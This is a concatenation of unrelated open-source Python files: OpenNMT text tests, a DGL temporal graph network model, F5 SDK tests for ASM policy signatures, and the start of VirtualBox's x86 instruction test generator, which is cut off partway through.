social/actions.py | raccoongang/python-social-auth | 1,987 | 18956 | from social_core.actions import do_auth, do_complete, do_disconnect
|
opennmt/tests/text_test.py | gcervantes8/OpenNMT-tf | 1,363 | 18971 | <reponame>gcervantes8/OpenNMT-tf<gh_stars>1000+
import tensorflow as tf
from parameterized import parameterized
from opennmt.data import text
class TextTest(tf.test.TestCase):
def _testTokensToChars(self, tokens, expected_chars):
expected_chars = tf.nest.map_structure(tf.compat.as_bytes, expected_chars)
chars = text.tokens_to_chars(tf.constant(tokens, dtype=tf.string))
self.assertListEqual(chars.to_list(), expected_chars)
def testTokensToCharsEmpty(self):
self._testTokensToChars([], [])
def testTokensToCharsSingle(self):
self._testTokensToChars(["Hello"], [["H", "e", "l", "l", "o"]])
def testTokensToCharsMixed(self):
self._testTokensToChars(
["Just", "a", "测试"], [["J", "u", "s", "t"], ["a"], ["测", "试"]]
)
@parameterized.expand(
[
[["a■", "b", "c■", "d", "■e"], [["a■", "b"], ["c■", "d", "■e"]]],
[
["a", "■", "b", "c■", "d", "■", "e"],
[["a", "■", "b"], ["c■", "d", "■", "e"]],
],
]
)
def testToWordsWithJoiner(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens)
self.assertAllEqual(words.to_list(), expected)
@parameterized.expand(
[
[["▁a", "b", "▁c", "d", "e"], [["▁a", "b"], ["▁c", "d", "e"]]],
[
["▁", "a", "b", "▁", "c", "d", "e"],
[["▁", "a", "b"], ["▁", "c", "d", "e"]],
],
[["a▁", "b", "c▁", "d", "e"], [["a▁"], ["b", "c▁"], ["d", "e"]]],
[
["a", "▁b▁", "c", "d", "▁", "e"],
[["a"], ["▁b▁"], ["c", "d"], ["▁", "e"]],
],
]
)
def testToWordsWithSpacer(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens, subword_token="▁", is_spacer=True)
self.assertAllEqual(words.to_list(), expected)
def _testPharaohAlignments(self, line, lengths, expected_matrix):
matrix = text.alignment_matrix_from_pharaoh(
tf.constant(line), lengths[0], lengths[1], dtype=tf.int32
)
self.assertListEqual(expected_matrix, self.evaluate(matrix).tolist())
def testPharaohAlignments(self):
self._testPharaohAlignments("", [0, 0], [])
self._testPharaohAlignments("0-0", [1, 1], [[1]])
self._testPharaohAlignments(
"0-0 1-1 2-2 3-3",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]],
)
self._testPharaohAlignments(
"0-0 1-1 2-3 3-2",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]],
)
self._testPharaohAlignments("0-0 1-2 1-1", [2, 3], [[1, 0], [0, 1], [0, 1]])
self._testPharaohAlignments(
"0-0 1-2 1-1 2-4",
[3, 5],
[[1, 0, 0], [0, 1, 0], [0, 1, 0], [0, 0, 0], [0, 0, 1]],
)
@parameterized.expand([[True], [False]])
def testInvalidPharaohAlignments(self, run_as_function):
func = text.alignment_matrix_from_pharaoh
if run_as_function:
func = tf.function(func)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "source"):
func(tf.constant("0-0 1-1 2-3 3-2"), 2, 4)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "target"):
func(tf.constant("0-0 1-2 1-1 2-4"), 3, 4)
if __name__ == "__main__":
tf.test.main()
|
examples/pytorch/tgn/tgn.py | ketyi/dgl | 9,516 | 18978 | <gh_stars>1000+
import copy
import torch.nn as nn
import dgl
from modules import MemoryModule, MemoryOperation, MsgLinkPredictor, TemporalTransformerConv, TimeEncode
class TGN(nn.Module):
def __init__(self,
edge_feat_dim,
memory_dim,
temporal_dim,
embedding_dim,
num_heads,
num_nodes,
n_neighbors=10,
memory_updater_type='gru',
layers=1):
super(TGN, self).__init__()
self.memory_dim = memory_dim
self.edge_feat_dim = edge_feat_dim
self.temporal_dim = temporal_dim
self.embedding_dim = embedding_dim
self.num_heads = num_heads
self.n_neighbors = n_neighbors
self.memory_updater_type = memory_updater_type
self.num_nodes = num_nodes
self.layers = layers
self.temporal_encoder = TimeEncode(self.temporal_dim)
self.memory = MemoryModule(self.num_nodes,
self.memory_dim)
self.memory_ops = MemoryOperation(self.memory_updater_type,
self.memory,
self.edge_feat_dim,
self.temporal_encoder)
self.embedding_attn = TemporalTransformerConv(self.edge_feat_dim,
self.memory_dim,
self.temporal_encoder,
self.embedding_dim,
self.num_heads,
layers=self.layers,
allow_zero_in_degree=True)
self.msg_linkpredictor = MsgLinkPredictor(embedding_dim)
def embed(self, postive_graph, negative_graph, blocks):
emb_graph = blocks[0]
emb_memory = self.memory.memory[emb_graph.ndata[dgl.NID], :]
emb_t = emb_graph.ndata['timestamp']
embedding = self.embedding_attn(emb_graph, emb_memory, emb_t)
emb2pred = dict(
zip(emb_graph.ndata[dgl.NID].tolist(), emb_graph.nodes().tolist()))
        # Since the positive graph and the negative graph have the same id mapping
feat_id = [emb2pred[int(n)] for n in postive_graph.ndata[dgl.NID]]
feat = embedding[feat_id]
pred_pos, pred_neg = self.msg_linkpredictor(
feat, postive_graph, negative_graph)
return pred_pos, pred_neg
def update_memory(self, subg):
new_g = self.memory_ops(subg)
self.memory.set_memory(new_g.ndata[dgl.NID], new_g.ndata['memory'])
self.memory.set_last_update_t(
new_g.ndata[dgl.NID], new_g.ndata['timestamp'])
# Some memory operation wrappers
def detach_memory(self):
self.memory.detach_memory()
def reset_memory(self):
self.memory.reset_memory()
def store_memory(self):
memory_checkpoint = {}
memory_checkpoint['memory'] = copy.deepcopy(self.memory.memory)
memory_checkpoint['last_t'] = copy.deepcopy(self.memory.last_update_t)
return memory_checkpoint
def restore_memory(self, memory_checkpoint):
self.memory.memory = memory_checkpoint['memory']
self.memory.last_update_time = memory_checkpoint['last_t']
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py | nghia-tran/f5-common-python | 272 | 19011 | <reponame>nghia-tran/f5-common-python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5.bigip.tm.asm.policies.signatures import Signature
from f5.sdk_exception import UnsupportedOperation
from requests.exceptions import HTTPError
class TestSignature(object):
def test_create_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.create()
def test_delete_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.delete()
def test_refresh(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
ws2 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
ws2.modify(performStaging=False)
assert ws1.performStaging is True
assert ws2.performStaging is False
ws1.refresh()
assert ws1.performStaging is False
def test_load_no_object(self, policy):
with pytest.raises(HTTPError) as err:
policy.signatures_s.signature.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == 'tm:asm:policies:signatures:signaturestate'
assert ws1.performStaging is True
ws1.modify(performStaging=False)
assert ws1.performStaging is False
ws2 = policy.signatures_s.signature.load(id=ws1.id)
assert ws1.selfLink == ws2.selfLink
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
def test_signatures_subcollection(self, policy):
coll = policy.signatures_s.get_collection()
assert isinstance(coll, list)
assert len(coll)
assert isinstance(coll[0], Signature)
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py | Fimbure/icebox-1 | 521 | 19031 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: InstructionTestGen.py $
"""
Instruction Test Generator.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
"""
__version__ = "$Revision: 118412 $";
# pylint: disable=C0103,R0913
# Standard python imports.
import io;
import os;
from optparse import OptionParser
import random;
import sys;
## @name Exit codes
## @{
RTEXITCODE_SUCCESS = 0;
RTEXITCODE_SYNTAX = 2;
## @}
## @name Various C macros we're used to.
## @{
UINT8_MAX = 0xff
UINT16_MAX = 0xffff
UINT32_MAX = 0xffffffff
UINT64_MAX = 0xffffffffffffffff
def RT_BIT_32(iBit): # pylint: disable=C0103
""" 32-bit one bit mask. """
return 1 << iBit;
def RT_BIT_64(iBit): # pylint: disable=C0103
""" 64-bit one bit mask. """
return 1 << iBit;
## @}
## @name ModR/M
## @{
X86_MODRM_RM_MASK = 0x07;
X86_MODRM_REG_MASK = 0x38;
X86_MODRM_REG_SMASK = 0x07;
X86_MODRM_REG_SHIFT = 3;
X86_MODRM_MOD_MASK = 0xc0;
X86_MODRM_MOD_SMASK = 0x03;
X86_MODRM_MOD_SHIFT = 6;
## @}
## @name SIB
## @{
X86_SIB_BASE_MASK = 0x07;
X86_SIB_INDEX_MASK = 0x38;
X86_SIB_INDEX_SMASK = 0x07;
X86_SIB_INDEX_SHIFT = 3;
X86_SIB_SCALE_MASK = 0xc0;
X86_SIB_SCALE_SMASK = 0x03;
X86_SIB_SCALE_SHIFT = 6;
## @}
## @name Prefixes
## @
X86_OP_PRF_CS = 0x2e;
X86_OP_PRF_SS = 0x36;
X86_OP_PRF_DS = 0x3e;
X86_OP_PRF_ES = 0x26;
X86_OP_PRF_FS = 0x64;
X86_OP_PRF_GS = 0x65;
X86_OP_PRF_SIZE_OP = 0x66;
X86_OP_PRF_SIZE_ADDR = 0x67;
X86_OP_PRF_LOCK = 0xf0;
X86_OP_PRF_REPNZ = 0xf2;
X86_OP_PRF_REPZ = 0xf3;
X86_OP_REX_B = 0x41;
X86_OP_REX_X = 0x42;
X86_OP_REX_R = 0x44;
X86_OP_REX_W = 0x48;
## @}
## @name General registers
## @
X86_GREG_xAX = 0
X86_GREG_xCX = 1
X86_GREG_xDX = 2
X86_GREG_xBX = 3
X86_GREG_xSP = 4
X86_GREG_xBP = 5
X86_GREG_xSI = 6
X86_GREG_xDI = 7
X86_GREG_x8 = 8
X86_GREG_x9 = 9
X86_GREG_x10 = 10
X86_GREG_x11 = 11
X86_GREG_x12 = 12
X86_GREG_x13 = 13
X86_GREG_x14 = 14
X86_GREG_x15 = 15
## @}
## @name Register names.
## @{
g_asGRegs64NoSp = ('rax', 'rcx', 'rdx', 'rbx', None, 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs64 = ('rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs32NoSp = ('eax', 'ecx', 'edx', 'ebx', None, 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs32 = ('eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs16NoSp = ('ax', 'cx', 'dx', 'bx', None, 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs16 = ('ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs8 = ('al', 'cl', 'dl', 'bl', 'ah', 'ch', 'dh', 'bh');
g_asGRegs8Rex = ('al', 'cl', 'dl', 'bl', 'spl', 'bpl', 'sil', 'dil',
'r8b', 'r9b', 'r10b', 'r11b', 'r12b', 'r13b', 'r14b', 'r15b',
'ah', 'ch', 'dh', 'bh');
## @}
## @name EFLAGS/RFLAGS/EFLAGS
## @{
X86_EFL_CF = RT_BIT_32(0);
X86_EFL_CF_BIT = 0;
X86_EFL_1 = RT_BIT_32(1);
X86_EFL_PF = RT_BIT_32(2);
X86_EFL_AF = RT_BIT_32(4);
X86_EFL_AF_BIT = 4;
X86_EFL_ZF = RT_BIT_32(6);
X86_EFL_ZF_BIT = 6;
X86_EFL_SF = RT_BIT_32(7);
X86_EFL_SF_BIT = 7;
X86_EFL_TF = RT_BIT_32(8);
X86_EFL_IF = RT_BIT_32(9);
X86_EFL_DF = RT_BIT_32(10);
X86_EFL_OF = RT_BIT_32(11);
X86_EFL_OF_BIT = 11;
X86_EFL_IOPL = (RT_BIT_32(12) | RT_BIT_32(13));
X86_EFL_NT = RT_BIT_32(14);
X86_EFL_RF = RT_BIT_32(16);
X86_EFL_VM = RT_BIT_32(17);
X86_EFL_AC = RT_BIT_32(18);
X86_EFL_VIF = RT_BIT_32(19);
X86_EFL_VIP = RT_BIT_32(20);
X86_EFL_ID = RT_BIT_32(21);
X86_EFL_LIVE_MASK = 0x003f7fd5;
X86_EFL_RA1_MASK = RT_BIT_32(1);
X86_EFL_IOPL_SHIFT = 12;
X86_EFL_STATUS_BITS = ( X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_ZF | X86_EFL_SF | X86_EFL_OF );
## @}
## @name Random
## @{
g_iMyRandSeed = int((os.urandom(4)).encode('hex'), 16);
#g_iMyRandSeed = 286523426;
#g_iMyRandSeed = 1994382324;
g_oMyRand = random.Random(g_iMyRandSeed);
#g_oMyRand = random.SystemRandom();
def randU8():
""" Unsigned 8-bit random number. """
return g_oMyRand.getrandbits(8);
def randU16():
""" Unsigned 16-bit random number. """
return g_oMyRand.getrandbits(16);
def randU32():
""" Unsigned 32-bit random number. """
return g_oMyRand.getrandbits(32);
def randU64():
""" Unsigned 64-bit random number. """
return g_oMyRand.getrandbits(64);
def randUxx(cBits):
""" Unsigned 8-, 16-, 32-, or 64-bit random number. """
return g_oMyRand.getrandbits(cBits);
def randSxx(cBits):
""" Signed 8-, 16-, 32-, or 64-bit random number. """
uVal = randUxx(cBits);
iRet = uVal & ((1 << (cBits - 1)) - 1);
if iRet != uVal:
iRet = -iRet;
return iRet;
def randUxxList(cBits, cElements):
""" List of unsigned 8-, 16-, 32-, or 64-bit random numbers. """
return [randUxx(cBits) for _ in range(cElements)];
## @}
## @name Instruction Emitter Helpers
## @{
def calcRexPrefixForTwoModRmRegs(iReg, iRm, bOtherRexPrefixes = 0):
"""
    Calculates a rex prefix if necessary given the two registers
and optional rex size prefixes.
Returns an empty array if not necessary.
"""
bRex = bOtherRexPrefixes;
if iReg >= 8:
bRex |= X86_OP_REX_R;
if iRm >= 8:
bRex |= X86_OP_REX_B;
if bRex == 0:
return [];
return [bRex,];
def calcModRmForTwoRegs(iReg, iRm):
"""
Calculate the RM byte for two registers.
Returns an array with one byte in it.
"""
bRm = (0x3 << X86_MODRM_MOD_SHIFT) \
| ((iReg << X86_MODRM_REG_SHIFT) & X86_MODRM_REG_MASK) \
| (iRm & X86_MODRM_RM_MASK);
return [bRm,];
## @}
## @name Misc
## @{
def convU32ToSigned(u32):
""" Converts a 32-bit unsigned value to 32-bit signed. """
if u32 < 0x80000000:
return u32;
return u32 - UINT32_MAX - 1;
def rotateLeftUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the left. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal << cShift) & uMask;
uRet |= (uVal >> (cBits - cShift));
return uRet;
def rotateRightUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the right. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal >> cShift);
uRet |= (uVal << (cBits - cShift)) & uMask;
return uRet;
def gregName(iReg, cBits, fRexByteRegs = True):
""" Gets the name of a general register by index and width. """
if cBits == 64:
return g_asGRegs64[iReg];
if cBits == 32:
return g_asGRegs32[iReg];
if cBits == 16:
return g_asGRegs16[iReg];
assert cBits == 8;
if fRexByteRegs:
return g_asGRegs8Rex[iReg];
return g_asGRegs8[iReg];
## @}
class TargetEnv(object):
"""
Target Runtime Environment.
"""
## @name CPU Modes
## @{
ksCpuMode_Real = 'real';
ksCpuMode_Protect = 'prot';
ksCpuMode_Paged = 'paged';
ksCpuMode_Long = 'long';
ksCpuMode_V86 = 'v86';
## @}
## @name Instruction set.
## @{
ksInstrSet_16 = '16';
ksInstrSet_32 = '32';
ksInstrSet_64 = '64';
## @}
def __init__(self, sName,
sInstrSet = ksInstrSet_32,
sCpuMode = ksCpuMode_Paged,
iRing = 3,
):
self.sName = sName;
self.sInstrSet = sInstrSet;
self.sCpuMode = sCpuMode;
self.iRing = iRing;
self.asGRegs = g_asGRegs64 if self.is64Bit() else g_asGRegs32;
self.asGRegsNoSp = g_asGRegs64NoSp if self.is64Bit() else g_asGRegs32NoSp;
def isUsingIprt(self):
""" Whether it's an IPRT environment or not. """
return self.sName.startswith('iprt');
def is64Bit(self):
""" Whether it's a 64-bit environment or not. """
return self.sInstrSet == self.ksInstrSet_64;
def getDefOpBits(self):
""" Get the default operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
return 32;
def getDefOpBytes(self):
""" Get the default operand size as a byte count. """
return self.getDefOpBits() / 8;
def getMaxOpBits(self):
""" Get the max operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_64:
return 64;
return 32;
def getMaxOpBytes(self):
""" Get the max operand size as a byte count. """
return self.getMaxOpBits() / 8;
def getDefAddrBits(self):
""" Get the default address size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
if self.sInstrSet == self.ksInstrSet_32:
return 32;
return 64;
def getDefAddrBytes(self):
""" Get the default address size as a byte count. """
return self.getDefAddrBits() / 8;
def getGRegCount(self, cbEffBytes = 4):
""" Get the number of general registers. """
if self.sInstrSet == self.ksInstrSet_64:
if cbEffBytes == 1:
return 16 + 4;
return 16;
return 8;
def randGRegNoSp(self, cbEffBytes = 4):
""" Returns a random general register number, excluding the SP register. """
iReg = randU16() % self.getGRegCount(cbEffBytes);
while iReg == X86_GREG_xSP:
iReg = randU16() % self.getGRegCount(cbEffBytes);
return iReg;
def randGRegNoSpList(self, cItems, cbEffBytes = 4):
""" List of randGRegNoSp values. """
aiRegs = [];
for _ in range(cItems):
aiRegs.append(self.randGRegNoSp(cbEffBytes));
return aiRegs;
def getAddrModes(self):
""" Gets a list of addressing mode (16, 32, or/and 64). """
if self.sInstrSet == self.ksInstrSet_16:
return [16, 32];
if self.sInstrSet == self.ksInstrSet_32:
return [32, 16];
return [64, 32];
def is8BitHighGReg(self, cbEffOp, iGReg):
""" Checks if the given register is a high 8-bit general register (AH, CH, DH or BH). """
assert cbEffOp in [1, 2, 4, 8];
if cbEffOp == 1:
if iGReg >= 16:
return True;
if iGReg >= 4 and not self.is64Bit():
return True;
return False;
def gregNameBits(self, iReg, cBits):
""" Gets the name of the given register for the specified width (bits). """
return gregName(iReg, cBits, self.is64Bit());
def gregNameBytes(self, iReg, cbWidth):
""" Gets the name of the given register for the specified with (in bytes). """
return gregName(iReg, cbWidth * 8, self.is64Bit());
## Target environments.
g_dTargetEnvs = {
'iprt-r3-32': TargetEnv('iprt-r3-32', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 3),
'iprt-r3-64': TargetEnv('iprt-r3-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 3),
'bs2-r0-64': TargetEnv('bs2-r0-64', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-64-big': TargetEnv('bs2-r0-64-big', TargetEnv.ksInstrSet_64, TargetEnv.ksCpuMode_Long, 0),
'bs2-r0-32-big': TargetEnv('bs2-r0-32-big', TargetEnv.ksInstrSet_32, TargetEnv.ksCpuMode_Protect, 0),
};
class InstrTestBase(object):
"""
Base class for testing one instruction.
"""
def __init__(self, sName, sInstr = None):
self.sName = sName;
self.sInstr = sInstr if sInstr else sName.split()[0];
def isApplicable(self, oGen):
"""
Tests if the instruction test is applicable to the selected environment.
"""
_ = oGen;
return True;
def generateTest(self, oGen, sTestFnName):
"""
Emits the test assembly code.
"""
oGen.write(';; @todo not implemented. This is for the linter: %s, %s\n' % (oGen, sTestFnName));
return True;
def generateInputs(self, cbEffOp, cbMaxOp, oGen, fLong = False):
""" Generate a list of inputs. """
if fLong:
#
# Try do extremes as well as different ranges of random numbers.
#
auRet = [0, 1, ];
if cbMaxOp >= 1:
auRet += [ UINT8_MAX / 2, UINT8_MAX / 2 + 1, UINT8_MAX ];
if cbMaxOp >= 2:
auRet += [ UINT16_MAX / 2, UINT16_MAX / 2 + 1, UINT16_MAX ];
if cbMaxOp >= 4:
auRet += [ UINT32_MAX / 2, UINT32_MAX / 2 + 1, UINT32_MAX ];
if cbMaxOp >= 8:
auRet += [ UINT64_MAX / 2, UINT64_MAX / 2 + 1, UINT64_MAX ];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
for cBits, cValues in ( (8, 4), (16, 4), (32, 8), (64, 8) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 16;
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
for cBits, cValues in ( (8, 8), (16, 8), (24, 2), (32, 16), (40, 1), (48, 1), (56, 1), (64, 16) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 64;
else:
for cBits, cValues in ( (8, 16), (16, 16), (24, 4), (32, 64), (40, 4), (48, 4), (56, 4), (64, 64) ):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, cValues);
cWanted = 168;
if len(auRet) < cWanted:
auRet += randUxxList(cbEffOp * 8, cWanted - len(auRet));
else:
#
# Short list, just do some random numbers.
#
auRet = [];
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
auRet += randUxxList(cbMaxOp, 1);
elif oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
auRet += randUxxList(cbMaxOp, 2);
else:
auRet = [];
for cBits in (8, 16, 32, 64):
if cBits < cbMaxOp * 8:
auRet += randUxxList(cBits, 1);
return auRet;
class InstrTest_MemOrGreg_2_Greg(InstrTestBase):
"""
Instruction reading memory or general register and writing the result to a
general register.
"""
def __init__(self, sName, fnCalcResult, sInstr = None, acbOpVars = None):
InstrTestBase.__init__(self, sName, sInstr);
self.fnCalcResult = fnCalcResult;
self.acbOpVars = [ 1, 2, 4, 8 ] if not acbOpVars else list(acbOpVars);
self.fTestRegForm = True;
self.fTestMemForm = True;
## @name Test Instruction Writers
## @{
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' %s %s, %s\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def writeInstrGregPureRM(self, cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen):
""" Writes the instruction with two general registers as operands. """
oGen.write(' ');
if iOp2 == 13 and iMod == 0 and cAddrBits == 64:
oGen.write('altrexb '); # Alternative encoding for rip relative addressing.
oGen.write('%s %s, [' % (self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),));
if (iOp2 == 5 or iOp2 == 13) and iMod == 0:
oGen.write('VBINSTST_NAME(g_u%sData)' % (cbEffOp * 8,))
if oGen.oTarget.is64Bit():
oGen.write(' wrt rip');
else:
if iMod == 1:
oGen.write('byte %d + ' % (offDisp,));
elif iMod == 2:
oGen.write('dword %d + ' % (offDisp,));
else:
assert iMod == 0;
if cAddrBits == 64:
oGen.write(g_asGRegs64[iOp2]);
elif cAddrBits == 32:
oGen.write(g_asGRegs32[iOp2]);
elif cAddrBits == 16:
assert False; ## @todo implement 16-bit addressing.
else:
assert False, str(cAddrBits);
oGen.write(']\n');
return True;
def writeInstrGregSibLabel(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and a label (base only w/o reg), SIB form. """
assert offDisp is None; assert iBaseReg in [5, 13]; assert iIndexReg == 4; assert cAddrBits != 16;
if cAddrBits == 64:
# Note! Cannot test this in 64-bit mode in any sensible way because the disp is 32-bit
# and we cannot (yet) make assumtions about where we're loaded.
## @todo Enable testing this in environments where we can make assumptions (boot sector).
oGen.write(' %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP]\n'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8,));
else:
oGen.write(' altsibx%u %s %s, [VBINSTST_NAME(g_u%sData) xWrtRIP] ; iOp1=%s cbEffOp=%s\n'
% ( iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), cbEffOp * 8, iOp1, cbEffOp));
return True;
def writeInstrGregSibScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and disp+scaled register (no base reg), SIB form. """
assert iBaseReg in [5, 13]; assert iIndexReg != 4; assert cAddrBits != 16;
# Note! Using altsibxN to force scaled encoding. This is only really a
# necessity for iScale=1, but doesn't hurt for the rest.
oGen.write(' altsibx%u %s %s, [%s * %#x'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iBaseReg;
return True;
def writeInstrGregSibBase(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes the instruction taking a register and base only (with reg), SIB form. """
oGen.write(' altsibx%u %s %s, [%s'
% (iScale, self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBits(iBaseReg, cAddrBits),));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
_ = iIndexReg;
return True;
def writeInstrGregSibBaseAndScaledReg(self, cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen):
""" Writes tinstruction taking a register and full featured SIB form address. """
# Note! From the looks of things, yasm will encode the following instructions the same way:
# mov eax, [rsi*1 + rbx]
# mov eax, [rbx + rsi*1]
# So, when there are two registers involved, the '*1' selects
# which is index and which is base.
oGen.write(' %s %s, [%s + %s * %u'
% ( self.sInstr, oGen.gregNameBytes(iOp1, cbEffOp),
oGen.gregNameBits(iBaseReg, cAddrBits), oGen.gregNameBits(iIndexReg, cAddrBits), iScale,));
if offDisp is not None:
oGen.write(' + %#x' % (offDisp,));
oGen.write(']\n');
return True;
## @}
## @name Memory setups
## @{
def generateMemSetupReadByLabel(self, oGen, cbEffOp, uInput):
""" Sets up memory for a memory read. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
return True;
def generateMemSetupReadByReg(self, oGen, cAddrBits, cbEffOp, iReg1, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iReg1, offDisp = offDisp),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iReg1],));
return True;
def generateMemSetupReadByScaledReg(self, oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp = None):
""" Sets up memory for a memory read indirectly addressed thru one register and optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, offDisp = offDisp, iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
return True;
def generateMemSetupReadByBaseAndScaledReg(self, oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp):
""" Sets up memory for a memory read indirectly addressed thru two registers with optional displacement. """
oGen.pushConst(uInput);
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iBaseReg = iBaseReg, offDisp = offDisp,
iIndexReg = iIndexReg, iScale = iScale),));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iIndexReg],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iBaseReg],));
return True;
def generateMemSetupPureRM(self, oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp = None):
""" Sets up memory for a pure R/M addressed read, iOp2 being the R/M value. """
oGen.pushConst(uInput);
